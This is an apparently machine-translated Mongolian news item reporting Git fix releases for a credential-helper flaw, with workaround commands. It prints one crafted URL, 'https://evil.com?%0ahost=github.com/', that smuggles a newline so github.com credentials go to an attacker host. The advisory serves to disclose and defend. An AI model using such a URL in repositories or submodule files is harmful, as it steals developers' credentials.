тархсан эх үүсвэрийн хяналтын системийн залруулах хувилбарууд Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 ба 2.17.4, устгасан () зохицуулагч дотор"", энэ нь git клиент шинэ мөрийн тэмдэгт агуулсан тусгай форматтай URL ашиглан репозитор руу нэвтрэх үед итгэмжлэлийг буруу хост руу илгээхэд хүргэдэг. Энэ эмзэг байдлыг халдагчийн удирддаг сервер рүү өөр хостын итгэмжлэлийг илгээхэд ашиглаж болно.
“https://evil.com?%0ahost=github.com/” гэх мэт URL-г зааж өгөх үед evil.com хост руу холбогдох үед итгэмжлэл зохицуулагч github.com-д заасан баталгаажуулалтын параметрүүдийг дамжуулна. Дэд модулиудын URL-г боловсруулах зэрэг "git clone" гэх мэт үйлдлүүдийг гүйцэтгэх үед асуудал үүсдэг (жишээ нь, "git submodule update" нь репозитороос .gitmodules файлд заасан URL-уудыг автоматаар боловсруулах болно). Хөгжүүлэгч нь URL хаягийг харалгүйгээр хадгалах газрыг хуулбарлах, жишээлбэл, дэд модулиудтай ажиллах эсвэл автомат үйлдэл хийдэг систем, жишээлбэл, багц бүтээх скрипт зэрэгт эмзэг байдал нь хамгийн аюултай.
Шинэ хувилбаруудын эмзэг байдлыг хаахын тулд итгэмжлэл солилцох протоколоор дамжуулсан аливаа утгын шинэ мөрийн тэмдэгтийг дамжуулах. Түгээлтийн хувьд та хуудаснууд дээрх багцын шинэчлэлтүүдийн гаралтыг хянах боломжтой , , , , , , .
Асуудлыг хаахын тулд тойрон гарах арга зам Олон нийтийн репозиторуудад хандахдаа credential.helper-г бүү ашиглаарай, мөн "--recurse-submodules" горимд "git clone"-г сонгоогүй хадгалах газруудтай ашиглаж болохгүй. credential.helper зохицуулагчийг бүрэн идэвхгүй болгохын тулд -аас нууц үгээ татаж авах , хамгаалагдсан эсвэл нууц үгтэй файлд та дараах тушаалуудыг ашиглаж болно.
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Эх сурвалж: opennet.ru